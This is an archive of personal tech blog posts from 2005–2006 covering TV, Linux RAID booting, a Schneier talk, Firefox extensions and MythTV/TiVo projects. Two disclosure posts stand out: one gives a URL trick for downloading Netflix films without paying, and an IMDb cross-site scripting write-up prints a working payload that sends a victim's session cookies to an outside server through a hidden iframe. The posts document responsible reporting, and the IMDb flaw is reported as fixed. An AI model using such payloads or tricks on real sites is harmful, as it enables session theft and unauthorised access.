codeblog code is freedom — patching my itch

4/26/2006

smallville, as measured in lana-minutes

Filed under: General — kees @ 7:00 am

I enjoy watching Smallville. I found Lana tiresome almost immediately. Recently, the writers teased us by showing an alternate future where she died. Struck with the possibility of not having to deal with her while watching the show, I became very excited. Then they brought the character back, and I couldn’t bear to continue watching the show. Every minute she’s on the screen is a minute stolen from me through the dark arts of terrible acting. If I didn’t so enjoy the rest of the plots and characters, I could so easily just stop watching. (I am also starting to run low on SG-1 episodes…)

To help combat my annoyance with Lana, I think I’m going to measure her screen-time. I’m going to count every minute that she’s on-screen and not dead, or when the on-screen plot is a direct result of her idoicy. (i.e. Clark complaining about something Lana did.) The goal will be to reach a “perfect episode” Lana-minute score of ZERO.

As a bonus, I figure I should also track Chloevage minutes. I figure Lana and Chloevage timers shouldn’t run if they’re both on screen at the same time — they cancel eachother; I am neither frowning nor smiling. The Chloevage-minutes would be a tie-breaker for episodes with nearly the same Lana-minutes value.

Ah, the physics of abstract television analysis.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

4/23/2006

grub, yaird, mdadm, and missing drives

Filed under: General — kees @ 7:54 pm

This is basically a rant. I spent all my energy tracking down the problems, so I never did get things actually fixed. :P

I have my machines configured for software RAID between my primary and secondary drives. I always have. LILO supported this configuration back in RedHat 5.2 days. I’ve been doing RAID1 for a long time now. About a year ago, I changed my preference for boot loaders to GRUB, and just kind of assumed it handled mirroring. Well, much to my surprise, grub totally and completely does not handle mirrored configurations. Even the proclaimed fix didn’t work.

As a result of this “discovery”, I’ve switched back to LILO, which, I think, is a pain in the ass because it doesn’t actually have any filesystem-smarts built into it. (i.e. I have to re-run “lilo” every time I change a kernel or initrd.) I may see if another fix works as expected, but I don’t have a lot of hope considering the device map in the filesystem is the same for both grub drives, which is what causes the problems in the first place. (“Ieee! Where did the other drive go?!”)

So, moving forward, assuming my bootloader works, all kernels from 2.6.13 forward don’t support devfs, and the older initrd tools can’t handle that. Debian invented “yaird”. I had assumed they used the /sys filesystem and did other smart things. As it turns out, it’s fairly brain-dead. I booted without one of my mirrored drives, and yaird totally freaked out. As I discovered while digging through the initrd yaird generated, it just statically builds device nodes, based on what the running system used to look like.

There are two problems with this:

  1. DM devices (LVM, crypto, etc) are dynamically assigned. They may not have the same numbers after rebooting. This is mostly worked around by waiting for stuff to show up in /sys, so I’ll only complain about Ubuntu’s practice of encoding the major/minor numbers for the root device. (e.g. 0xFF00 — my root partition may not always be detected first) I don’t understand this, since the loader handles string-based paths for the root partition. But that’s not the bug I ran into for this rant.
  2. If a device goes missing, yaird assumes this is a bad thing. It has no concept of quorum. It could be argued that it shouldn’t, but in that case, it shouldn’t drop me to a prompt every time a device goes missing. It should only do that in “debug” mode. (I should send my patch for that in.)

While digging to open a Debian Bug report against yaird, I discovered that yaird, while annoyingly dropping me to a prompt (which I can “exit” out of), isn’t the real problem. The real problem is that “mdadm” incorrectly thinks it can’t start up the mirror with only 1 drive. There’s actually a counting bug where it just flat out thinks it needs 2 drives to start. Once I found this, I got pissed, “What? How could this bug exist?”

I proceeded to find the current source for mdadm, so I could write a patch to fix it. Only then did I discover that Debian’s version of mdadm is 5 REVISIONS BEHIND (including a major version jump)! AAAGGGh!

At this point I got in line reporting how old mdadm is, installed a work-around-mdadm patch to my yaird templates, and switched back to LILO. Ugh. And before someone yells “Run Gentoo!”, I checked already. The Gentoo mdadm version is old too. But at least they have a masked ebuild of the modern versions.

I hate choosing between stability and bleeding edge, but I don’t usually complain because I recognize the costs associated with stabilizing new stuff. But, come on, the mdadm 2.x series came out in AUGUST. That’s 8 months ago. I think that’s pretty stable! *sob*

I wish I had enough time to be a Debian maintainer instead of just sitting here and moaning, but hopefully my bug reports will do some good. :)

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

4/13/2006

Bruce Schneier on attack trends

Filed under: Blogging,Security — kees @ 9:20 pm

On Wednesday I attended Bruce Schneier‘s short talk about the trends of online attacks. I figure I need to take his talk with at least a small grain of salt. While he has a reputation to maintain, he also works for a security outsourcing company. That in mind, I still like reading his blog, and I enjoyed hearing him talk.

The main take-away from his talk was that attackers are more rarely “hobbyists”, and more commonly criminals. (i.e. there is profit motive rather than an interest in boasting rights.) In the same vein, worms are becoming more sophisticated, quieter, and increasingly effective, while losing their cleverness. (Criminals don’t care if their worm is lame, they don’t care if they ripped off someone else’s worm, they care that their worm is staying undiscovered and is making them money. As a result, whole families of slightly different worms are appearing.)

One thing he said, that I have a hard time believing, and if true is pretty scary, is that cyber-crime profits are now exceeding drug profits. I would love to understand what the sources for that statistic are. Beyond just phishing, beyond worms waiting for you to authenticate to banks before emptying your wallet, there is even small-scale Denial-of-Service extortion. Generally, it’s against places that are themselves on tenuous legal ground, like offshore gambling sites. “If you don’t pay us $X, we’ll DoS you again!” It’s protection money online. Wild.

The market for blackhat exploits is growing. This is reducing the time between vulnerability announcement and exploit usage. Unfortunately, in the Microsoft world, an opposite trend is happening: patch speed is slowing due to their needing to test more and more configurations, staying infinitely backward compatible. At least this has an upside that their patches are generally better and corporations are learning to trust auto-update systems. (And I think this kind of brain-share is actually good for all OS vendors.)

The commoditization (and therefore homogenizing) of hardware and software means that everyone runs the same stuff. Even the criminals. Before, generally only the various corporations had old AS/400 machines and no one really wrote attacks against them. Now stuff runs on PCs.

Overall, the attacks online are becoming increasingly more damaging financially (“criminals are good at what they do”). The volume of attacks come from the open Internet, but the more successful attacks come from inside a private network. More worms are simply waiting for opportunity instead of beating on a network.

While some of the crime organizations have been taken down, there are still large bot networks that are continuing to grow in size even though they have no controller any more. This is truly something out of dystopic sci-fi. I don’t know why, but while I find the idea of full AIs reasonable, and totally non-intelligent systems reasonable, I find half-AI systems really creepy. They just keep doing some semi-smart thing over and over waiting until mommy comes back to tell them to do something else now.

He wound down discussing his worries for the future. He wants people thinking about VoIP security now. (Worms sniff your typing and packets already, soon they can sniff your voice.) He hinted at Digital Restrictions Management without actually saying DRM. (“Who owns your computer?” To which I thought, “I do. This is why Free Software is so important.”)

In closing he talked about security being more about usability than technology. I took that to mean “the Art of security is more about usability than technology.” I can have infinite security by just unplugging something. But that’s not very artful. Towards the goal of successful (artful) security, he wants to see service providers be ultimately liable for the financial damage. He figures this puts the motivations in the right place. It seems like the right thing to me (if credit card companies want to avoid it, it must be good for me) but I suspect there is something hidden deeper that may cause greater harm. I can’t put my finger on it, so for now, I’ll agree. :)

At one point he gave a nice view into his own world, in which he has to go twice a year and disinfect his own mother’s computer of worms. The cobbler’s childrens’ feet…

The end of the session was a book signing (Counterpane gave out gratis copies of Schneier’s new book “Beyond Fear“). I showed my geek by having brought a copy of “Applied Cryptography” for him to sign too. For which he was geek-prepared, and tossed in a cryptogram. Even though he does this for lots of people (Google told me later), it was fun to see it in my book; I wasn’t expecting it.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

4/11/2006

construction movies

Filed under: Multimedia — kees @ 7:55 pm

From the time-lapse construction webcam I set up with Brian, I built a pair of AVIs. These were made with ffmpeg so they use the FMP4 codec. Windows folks can find ffdshow in a number of places.

Left view movie (31M), set to Delerium’s “Silence” (with Sarah Mclachlan).
Right view movie (24M), set to a remix of Everything But the Girl’s “Like the Deserts Miss the Rain”.

I tried to build these movies showing only day-light hours, on work days. A few holidays sneak in, though. (There’s a longer section of a few days where no one shows up for work across Thanksgiving, for example.)

The AVI frame rate is 25fps, with each frame jumping 10 minutes. The effective speed is 14400:1. They span the time from July 26 2005 through January 21 2006. (The right-side camera was added on August 29.)

My least favorite easter egg is where the room-light-shield I taped up to keep room glare off the camera peels off the window and hangs in front of one of the cameras during Christmas and New Year’s vacation (when no one was around to fix it).

My most favorite easter egg is near the latter half when a pile drilling rig is parked in the foreground. Over the course of the day, the hydraulics holding the drill up at an angle bleed out, and the drill slowly pitches forward. I just love it; it’s exactly the kind of event no one notices at the time because it’s happening so slowly. Seen in time-lapse, though, it’s very obvious — it’s the only thing moving at all! :)

Enjoy!

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

4/9/2006

greasemonkey for RMLS

Filed under: Web — kees @ 8:15 pm

The house-for-sale listings that RMLSweb.com produces are very detailed, and even include a link to show a map for each house’s address. However, this link goes to MapQuest, which I find infuriatingly annoying to use. I wanted the link to at least go to Google Maps instead. Since I live near Portland, I also wanted to search the fantastic Portland Maps site at the same time. That way I could see lot dimensions, crime statistics, etc.

This was clearly a perfect job for GreaseMonkey. The result, after my usual fights with javascript, is my script to override the RMLS address mapping function.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

4/2/2006

in honor of DST: SW

Filed under: Blogging — kees @ 7:56 am

Since I’ve lost an hour to Daylight Savings Time, I thought I’d record a list of links to Alternate Star Wars Theories.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

4/1/2006

NetFlix movie downloading

Filed under: Multimedia,Vulnerabilities — kees @ 12:22 pm

Netflix accidentally lets you download movies for free. I reported this on March 18th, but they still haven’t replied. It’s been 2 weeks, so I’m posting the details now.

While digging through Netflix’s javascript I found a function named “startDownload“. I was originally just curious about the AJAX responsible for the movie info popup boxes, but this proved much more interesting.

I’m guessing they must be beta-testing this for some accounts because nothing visible through my account ever calls “startDownload“, but I could still use it.

Turns out the function handles a bitrate selection, and then just rewrites the URL a little. You can get the same affect by just adding “&download=avi&br=4” to the end of a movie info URL. For example, this is the URL to get info about Ice Age, and this is the URL to download Ice Age. This even seems to work without being logged in.

I haven’t had time to check if everything in their library is downloadable, but of the 6 or so I tried, they all worked. If anyone finds a cut-off date, let me know.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

3/27/2006

presenting at OSCon 2006

Filed under: Blogging,Multimedia — kees @ 6:43 pm

Woohoo! I got accepted to present at OSCon again! I’m really excited about this one, too — I get to present about something non-work-related. The title of my presentation is “DVR Happiness: Gluing MythTV and TiVo together with Galleon“. Here is my proposed outline:

  1. Intro to DVRs
    • TiVo: have you been under a rock?
    • MythTV: learn all about video standards.
  2. TiVo Gets You A Lot
    • Hacked TiVos can do great things
    • Is your TiVo a tool or a toy?
    • Stock TiVos can do cool stuff too
    • ToGo: move video from TiVo to PC
    • GoBack: move video from PC to TiVo
    • MP3s: streaming from anywhere
    • Image Galleries: beyond just snapshots
    • Galleon Gets You More
    • Implements the server-side of TiVo features
    • On-the-fly format conversion
  3. MythTV Gets You The Most
    • Making Tivo recordings available to MythTV
    • Format conversion
    • Making MythTV recordings available to TiVo
    • Mounting a MythTV filesystem with FUSE
    • Making your MythTV remote make noises
    • Short-cuts with the Linux IR daemon

EDIT: WordPress pisses me off so very much when it comes to lists, indenting, and code snippets. Some day, I will switch to something that just lets me type in HTML and doesn’t try to “fix” it for me afterwards. *fume*

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

3/23/2006

amd64 is okay

Filed under: General — kees @ 8:36 pm

I’m fairly happy with my amd64 box, but it has some bothers. It reminds me of switching from 16bit to 32bit applications back in the day. Since the SATA drivers were busted on every distro I tried to install, I ended up with Debian Unstable — probably because I know how to dance around needing a more recent kernel.

Audio wasn’t working right away, but it looks like ALSA has resolved the issues finally. These fancy new 6-channel chips are silly. Maybe in 5 years I’ll actually have something other than stereo speakers on my computer. :)

Switching to 64bit has really shown me all the non-free software I use, since I can’t run these 32bit-compiles natively anymore:

  • acroread
  • various proprietary A/V codecs (DLLs via MPlayer)
  • Flash plugin
  • Wine
  • OpenOffice.org

Okay, so Wine and OpenOffice.org don’t run because of porting issues, but still. There have been two ways to solve these problems:

  • 32bit versions of various libraries
  • chroot to a 32bit environment

Installing 32bit libs is nice, but Debian isn’t smart enough to let me install .i386.deb files along with my .amd64.deb files. There’s got to be a way, but I haven’t figured it out. So, I followed the Ubuntu instructions, and built a 32bit chroot environment. Any time I want to watch something in Flash, I run “bash32” and run Mozilla in there, which has the Flash plugin. Same for OOo, etc. With the mount bindings (e.g. “mount -o bind /home /chroot/sid/home”) it’s like I never left home. Audio even works. Pretty slick solution.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

3/22/2006

debugging firefox extensions

Filed under: Web — kees @ 6:15 pm

After installing my amd64 machine and getting my desktop moved, I noticed that Firefox seemed to be running really slowly. Especially google maps. After Brian showed me the Firefox Hacks book, I decided to try and dig into the cause.

By setting the environment variable “NSPR_LOG_MODULES=all:5” you see damn near everything Firefox is doing while it does it. I noticed that it was stalling every time it processed a new cookie (since I don’t let Google set cookies). So I started removing each of my cookie extensions.

To get myself back to a sane state, I just backed up my Firefox profile:

cp -a ~/.mozilla/firefox/*.default ~/firefox-profile

Then removed one extension, restarted Firefox, etc, until I found the busted one. Turns out “Extended Cookie Manager” was my problem, so I replaced it with “Cookie Button in the status bar”.

Tedious, but, it worked. And for some reason, getting a list of all the Firefox environment variables proves to be very difficult.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

3/5/2006

sci-fi crew

Filed under: Blogging — kees @ 8:30 am
You scored as Moya (Farscape). You are surrounded by muppets. But that is okay because they are your friends and have shown many times that they can be trusted. Now if only you could stop being bothered about wormholes.

Moya (Farscape)
 
88%
Babylon 5 (Babylon 5)
 
81%
Bebop (Cowboy Bebop)
 
75%
Millennium Falcon (Star Wars)
 
75%
Serenity (Firefly)
 
75%
SG-1 (Stargate)
 
75%
Deep Space Nine (Star Trek)
 
69%
Nebuchadnezzar (The Matrix)
 
69%
FBI’s X-Files Division (The X-Files)
 
69%
Enterprise D (Star Trek)
 
63%
Galactica (Battlestar: Galactica)
 
56%
Andromeda Ascendant (Andromeda)
 
44%

Your Ultimate Sci-Fi Profile II: which sci-fi crew would you best fit in? (pics)
created with QuizFarm.com

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

1/18/2006

mecha gone wild

Filed under: Blogging — kees @ 9:28 am

This has got to be the coolest use of an animated GIF ever:

walking mech

Even crazier, in Firefox, if you right-click to “View Image”, the favicon shown in the tab is animated too! I smell code re-use! That kicks ass. I wonder what level of hell I’d burn in if I made the favicon for my site animated.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

1/17/2006

ngsec games

Filed under: Reverse Engineering,Security — kees @ 5:49 pm

Today I was reminded of the NGsec security games site from a DefCon CTF team-mate. (This game was actually used as a prequal for DefCon 10, which I didn’t go to. Ken told me stories about it, though.) I burned through stages 1-9 in about 45 minutes, and then hit stage 10 and was side-tracked learning about encrypted ELF binaries.

There continues to be no useful FOSS binary analyzers for this kind of reverse engineering. gdb just doesn’t even begin to cut it: it was made for (surprise!) debugging programs built by friendly compilers, not doing forensics on decidedly unfriendly, hand-crafted binaries . If Paul Graham and Richard Hamming are to be believed:

  1. What are the most important problems in your field?
  2. Are you working on one of them?
  3. Why not?

I should be writing a static binary analyzer. And a dynamic one too. GPL IDApro replacement. Yeow.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

1/16/2006

kernel.org and sendfile

Filed under: kernel.org,Networking,Security — kees @ 4:50 pm

The “sendfile” system call is a way to send file contents directly out to a network socket. This saves time in userspace (so it doesn’t have to copy buffer contents around), and was one of the reasons I upgraded kernel.org‘s Apache to version 2.x at the end of 2003 (because version 1.x doesn’t have sendfile support). A few weeks ago, one of the other kernel.org admins discovered that files greater than 2G were not being delivered by Apache.

I had a lot of fun tracking down the issue. The “amount to send” argument in the sendfile call is a “size_t”, which is basically an “unsigned long”. Having a 2G limit didn’t make sense, since even with 32 bits, that should be a 4G limit. However, the kernel.org servers are both 64bit, so as it turns out, “size_t” is a full 64 bits. After writing a quick test, I was able to verify that it was, indeed, a 31 bit limit on both 64 bit and 32 bit kernels. Peter Anvin took it from here, and tracked down the origin of the problem: filesystem operations greater than 31 bits in offset were being rejected deep in the kernel. He suggested truncating the request instead of returning a failure.

Seems as though Linus decided to limit the size of filesystem calls to make sure there aren’t security problems (signed vs unsigned overflows) in the various filesystem drivers, while people using the Linux kernel migrate more from 32bit to 64bit systems. Personally, I don’t agree with this, but from a practical stand-point, it hardly makes a difference. Instead of sending all 4G out the pipe and returning to user space, it just returns twice, sending 2G per call.

This should be fixed in 2.6.16. Until then, we could patch Apache to keep it’s offset request under 31 bits, but we’ll probably just tell people to use FTP, since vsftpd doesn’t use sendfile yet.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

1/14/2006

open source as prior art

Filed under: General — kees @ 6:41 pm

I’m involved in the Open Source as Prior Art initiative. The goal being to more readily make FOSS available as prior art for the US Patent and Trade Office to use while examining software patent applications, reducing the number of poorly issued software patents.

This is a rather touchy area given the fact that most FOSS proponents (myself included) would rather see software patents go away completely. However, in the US, this is not likely to happen any time soon, since it’s not up to the USPTO, it’s up to the US Legislature; the USPTO has to implement the law, which puts them in a bind since they’re not very successful right now at finding prior art (and the laws surrounding prior art discovery aren’t that helpful either). In my opinion, if the USPTO could reliably find prior art, they would start rejecting almost all software patent applications, and the futility of software patenting would become clear to those that didn’t already recognize it. If I’m wrong, then I’d hope that with the very few patents issued, innovation really would return to the system.

Groklaw has already discussed the OSaPA project and the overall “Patent Quality Improvement” initiatives announced by the USPTO. I’ve read these and several other articles, each ranging from praise to scepticism, looking for more thoughts on subject, trying to help me shape my opinions.

One of the most sceptical was written by Greg Aharonian from the Internet Patent News Service (which ironically has no online archives for me to link to). His scepticism is mostly aimed at the USPTO and IBM, and not directly at the various initiatives, past or present. His fundamental point is that the USPTO doesn’t appear to have manged to use the (voluminous) resources it already has at its fingertips, so why would adding more help the situation? This approach didn’t work in the past, and there’s no indication that anything has changed in the USPTO to make it a success this time around.

I don’t have the historical background to know if it’s a fair assessment, but I enjoyed his analogy:

“[…] IBM is Lucy, PTO management is Charley [sic] Brown, and these fake initiatives to improve patent quality are the football that the PTO keeps on trying to kick, only to be fooled again and again.”

One thing I think he may have missed, though, was that the OSaPA initiative contains another player. The initiative itself may again be the football, and the USPTO and IBM may again be playing, just as with prior (seemingly failed) initiatives. However, this time, the FOSS community is involved. I like to think that in Greg’s analogy, the FOSS community is Charles Schultz. We can draw any damn comic we want, and we’ll still be around after the initiatives, IBM, and the USPTO are long forgotten. The FOSS community is on the multi-hundred year plan, the same as any other sustainable cultural plan. If Greg’s predictions come to pass, and it really does turn out to be a waste of time, I still have faith that it’ll only be the USPTO (and, unfortunately, the US) getting hurt. To borrow from John Gilmore, FOSS will treat this as a defect, and route around it.

Regardless of history, I sincerely hope the USPTO takes this novel chance to harness the power of the FOSS community. We’re interested in helping them solve their problems, and if the USPTO drops the ball, it’s unlikely the FOSS community will ever look back.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

1/7/2006

cheap auto-rotoscoping

Filed under: Multimedia — kees @ 2:35 pm

In the back of my head, I’ve been wondering about various ways I could use my $20 camcorder. Making cheap movie shorts, like SNL’s “Lazy Sunday” come to mind. There are no fancy zooms or special effects. It’s all editing and audio. Bryce kicked some ideas my way, most of which include using the dogs and/or cats as the primary actors (I can pay them in kibble). He also suggested renewing my father’s Rottweiler Camcorder with a much smaller device. I think the images would be mostly obscured by my dog’s chin. We’ll see. I also worry it may suffer from being summarily ingested.

While playing Name that Tune 80s DVD Edition, the a-ha video for “Take On Me” came on. The rotoscoping used to create the animated parts made me think of Inkscape‘s autotracing function, and I lept up to go investigate the possibilities.

So far, I’ve played with two styles. One leaves the autotraced fill areas (which makes a video look like a really freaky cartoon), and one that reduces the fill opacity, and adds line density so it looks more like a regular outlined cartoon. That one tends to be distracting, though, since the edges keep jumping all over the place.

The autorotoscope script requires mplayer, ImageMagick, autotrace, and ffmpeg.

Here are the results:

These AVIs use xvid for their video codec. If you don’t already have it, you can get them from here.

© 2006 – 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

1/3/2006

my firefox extensions

Filed under: Web — kees @ 11:50 pm

I’ve gotten all my Firefox extensions straightened out again since the 1.5 shake-up. Now that it’s sane, I wanted to report what I’m using so I’ll remember for the future, and so I can go look somewhere if I’m on my laptop or some other machine and I can’t remember which extension I was looking for.

Also at least one other person has asked me what extensions I’m using, so maybe others would be interested. I used the following to get a human-readable list of my extensions:

egrep ':(version|name|description|type)' ~/.mozilla/firefox/*.default/extensions.rdf | \
perl -pe 'print "\n" if (/:version/); s/^[^=]+="//; s/"$//;' | \
(read EMPTY; while read VER; do \
  read NAME; read DESC; read TYPE; read EMPTY; \
  if echo "$TYPE" | grep \>2\<>/dev/null; then \
    echo "$NAME $VER"; echo "$DESC"; echo ""; \
  fi; \
done)

I bet there is an elegant XPath command to extract this directly with a single “perl” execution, but, uhm, I’m not an XML expert. :)

Almost all of these extensions were gotten from the Firefox extensions list:

  • BugMeNot (0.9) Bypass compulsory web registration with the context menu via www.bugmenot.com.
  • Tabbrowser Preferences (1.2.8.8) Enhances control over some aspects of tabbed browsing.
  • Modify Headers (0.5.1) Add, modify and filter http request headers
  • View Rendered Source Chart (1.2.03) Creates a Colorful Chart of a Webpage’s Rendered Source
  • Gcache (0.2.1) Displays a google cached version of the webpage.
  • Adblock (0.5.2.039) Filters ads from web-pages
  • Word Count (0.3) Counts the number of words in selected text.
  • Allow Right-Click (0.3) Defeats web sites’ right-click prevention scripts.
  • JavaScript Options (1.2.2) Provides advanced JavaScript options for Firefox.
  • User Agent Switcher (0.6.6) Adds a menu and a toolbar button to switch the user agent of the browser.
  • Live HTTP Headers (0.11) View HTTP headers of a page and while browsing.
  • Download Manager Tweak (0.7.1) A modification of the Firefox download manager that changes its appearance and allows it to be opened in a separate window, a new tab, or the sidebar.
  • View Cookies (1.5) View cookies of the current web page.
  • udtranslate (0.0.7) UDTranslate: a zombie translation utility for Urban Dead
  • Stop-or-Reload Button (0.2) Turns the stop and reload buttons into a single one. When you can stop, you have a Stop button, otherwise you have a Reload button. (Like in Safari)
  • QuickJava (0.4.1) Allows quick enable and disable of Java and Javascript from statusbar.
  • Flashblock (1.5) Replaces Flash objects with a button you can click to view them.
  • Greasemonkey (0.6.4) A User Script Manager for Firefox
  • Fasterfox (1.0.1) Performance and network tweaks for Firefox.
  • Disable Targets For Downloads (1.0) Prevents download links opening a blank window.
  • QuickProxy (2005.12.04) Quickproxy creates a statusbar button to quickly turn the proxy on and off.
  • DownThemAll! (0.9.8.4) The mass downloader for Firefox.
  • Web Developer (0.9.4) Adds a menu and a toolbar with various web developer tools.
  • Wayback (0.1.1) Displays an archived version of the webpage.
  • Extended Cookie Manager (0.5.5) Change the cookie status for websites on demand.

In addition, it seems the option in TabBrowserPreferences for URL pasting into the display window to load was removed. After some Googling, I was directed to the about:config page, under “middlemouse.contentLoadURL”. Set it to true to restore the prior default behavior.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

12/23/2005

mythtvfs

Filed under: Multimedia — kees @ 2:58 pm

My first working crack at getting a filesystem overlay working between MythTV, Galleon, and my TiVo is finished. If you’re brave, check it out.

© 2005 – 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

12/22/2005

galleon and FUSE

Filed under: Multimedia — kees @ 9:46 pm

Every few years, I end up relearning Java for some project or another. Today, that project is Galleon, the fantastic TiVo Home Media Server. I’ve been sort of mildly involved in another person’s attempts to get MythTV and his TiVo working nicely together.

The basic situation is this: I want to be able to watch stuff I’ve recorded on my MythTV box via my TiVo. Galleon already does this.

Using the “GoBack” TiVo feature, Galleon acts like another TiVo on the network, and sends a show to the TiVo. Normally this is used to send a .TiVo file from your computer back to the TiVo. In the case of TiVo-to-TiVo communication, they include the metadata about the show (title, air date, duration, description, etc) before starting the data transfer. Galleon stores the metadata to a local database when it downloads shows via the ToGo feature.

It is possible to send any valid MPEG stream to the TiVo, but unless the Galleon database has metadata for the show, there will be nothing but the filename on the TiVo end when it transfers. In the case of MythTV shows, the metadata is contained in the MythTV database. I’m hoping to create a MythTV “application” for Galleon that will connect to the MythTV database, and populate the TiVo with the needed metadata.

Since I’m so green on Java, I’m doing something else as a “proof-of-concept”. It was suggested that some of the metadata could be encoded into the filename. This requires two halves: a parser in Galleon to extract the data, and the files to be named with their metadata encoded.

On the Galleon side, I’m digging around with the StringTokenizer, and generally getting my feet wet with the Galleon source and banging my head on the java compiler.

On the filesystem side, I’m going to use FUSE to create an overlay filesystem that queries the MythTV database, and builds a list of files based on an NFS mount’s contents. (Which I’ll NFS mount from my MythTV box.)

Mostly I just wanted to write a FUSE application. :)

© 2005 – 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

12/12/2005

historical exchange rates

Filed under: General — kees @ 11:07 pm

Tonight I discovered that finding out the historical worth of money is a little tricky to calculate. :) On Poirot tonight, he bought 19 pairs of silk stockings in order to trap a thief. The clerk kept warning him that they were “very expensive”. The final bill was 35 shillings per pair. I thought this was rather odd that a value not involving pounds would be considered “very expensive”. Feeling very detective-oriented, I had to investigate.

First of all, I found a nice conversion chart for British currency. 35 shillings is 1.75 pounds. The story took place in roughly 1928, but that doesn’t change the shillings calculation because even after the decimalization in 1971, shillings and pounds kept their 20-to-1 ratio.

Trying to find “current worth” of historical monies was a little more difficult. I found the How Much Is That? site, and it seems that 1.75 pounds is worth about $95 in present day. Good stockings are about $15 a pair now, and since nylon was invented in 1935, it doesn’t seem unreasonable that good stockings would be about 10 times more expensive in 1928.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

xmltv article

Filed under: Multimedia — kees @ 11:59 am

My friend Brian just had his article-writing debut on O’Reilly‘s ONLamp site. He wrote about how to use XMLTV to help manage your TV viewing schedules if you don’t have a DVR doing it for you (or not doing it well enough).

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10/31/2005

imdb xss

Filed under: Security,Vulnerabilities — kees @ 10:43 pm

Last week I discovered a cross-site scripting vulnerability in IMDb’s website. It was a strong enough vulnerability that I could actively steal login sessions with it. Part of their Search system would pass the “to-be-displayed” location on the URL, and didn’t quote HTML entities. I was able to steal my own cookies and log in with my IMDb account from another computer. Last Wed, I reported it:

26 Oct 2005 10:29:59 PM
Hello!

It seems your service is vulnerable to cross-site scripting (XSS). Since you
have login information stored as cookies, it’s possible for people to trick
others into exposing their logins. As an example, this displays your cookies to
you in your browser:

http://imdb.com/List?locations=a&&heading=18;%3Cscript%3Ealert(document.cookie)%3C/script%3E

Please let me know if you have any questions. I love using IMDb, and thought
you might want to make yourselves more secure.

Thanks!

At 9am today, they had fixed it:

31 Oct 2005 09:01:17 AM
Thank you for your feedback about the Internet Movie Database.

The IMDb is constantly being updated and improved, and we welcome all comments and suggestions aimed at improving its features, flexibility and ease of use.

We appreciate that you took the time to share your thoughts with us. It has now been fixed.

Thank you for your support!

—-
Regards,
[name]
The IMDb Help Desk

Another success for vulnerability reporting!

As for a concrete example, the “heading” argument to their search tool was being displayed. The harmless example I used above just pops an alert dialog. To actually pass the cookies off-site where it can be collected, I used an invisible IFRAME, and pulled a content-less document from my server. To do this, I wanted the following to appear on the IMDb page:

<iframe src=”http://outflux.net/null.html?cookie” width=”0″ height=”0″ frameborder=”0″</iframe>

There are a number of ways to take the browser off-site. Another are the HTTP methods that get used in a lot of AJAX applications. I haven’t dug into using that, even though they’re way more powerful (since you don’t need to “hide” the results of an IFRAME, etc, if you don’t listen for the HTTP results, they just never get used — it’s only the “side-effect” of recording the cookie off-site that’s wanted). Since this XSS vulnerability lets me write JavaScript directly to the browser, I needed to inject the following:

document.write(‘<iframe src=”http://outflux.net/null.html?’+document.cookie+'” width=”0″ height=”0″ frameborder=”0″</iframe>’)

And here it is, HTML-encoded, stuffed into the middle of the “header” argument to the search function, disguised as a search for filming locations in Vancouver, BC:

http://imdb.com/List?endings=on&&locations=Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%20Canada&&heading=18;with+locations+including;Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%3Cscript%3Edocument.write(‘%3Ciframe%20src=%22http://outflux.net/null.html?’%2Bdocument.cookie%2B’%22%20width=%220%22%20height=%220%22%20frameborder=%220%22%3E%3C/iframe%3E’)%3C/script%3E%20Canada

And if you click that, you can see their newly fixed entity-escaping. Again, kudos to IMDb! Additionally, it looks like they rearranged their search tool to not even use the “header” argument anymore. Neato.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10/28/2005

gcc extensions

Filed under: General — kees @ 7:30 am

Robert Love wrote up a great summary of GCC extensions. Recommended reading! This is exactly the kind of summary I’ve been hoping to run into. Maybe I can go through Inkscape adding all sorts of fun tags to functions and variables now. :)

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10/27/2005

pastebin rulez

Filed under: Security,Vulnerabilities — kees @ 7:40 am

When discussing code on IRC, I’ve found http://pastebin.com/ to be a valuable resource for sharing code snippets. It has a really simple interface, and can give you a semi-private area just by specifying a subdomain (e.g. http://yayoutflux.pastebin.com/).

